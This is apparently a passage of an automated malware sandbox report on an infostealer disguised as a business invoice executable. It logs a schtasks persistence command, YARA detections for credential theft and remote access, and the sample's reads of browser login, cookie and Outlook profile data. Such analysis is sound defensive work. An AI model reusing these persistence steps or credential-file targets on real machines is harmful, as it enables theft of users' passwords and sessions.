                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9536.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeProcess created: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeQueries volume information: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeQueries volume information: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeQueries volume information: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeQueries volume information: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 11.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 7968, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 4820, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: GhrKoSGuCdvpJ.exe PID: 4268, type: MEMORYSTR
                    Source: Yara matchFile source: 11.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 7968, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 4820, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: Yara matchFile source: 11.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 7968, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 4820, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: GhrKoSGuCdvpJ.exe PID: 4268, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 11.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 7968, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 4820, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: GhrKoSGuCdvpJ.exe PID: 4268, type: MEMORYSTR
                    Source: Yara matchFile source: 11.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.400000.0.unpack, type: UNPACKEDPE
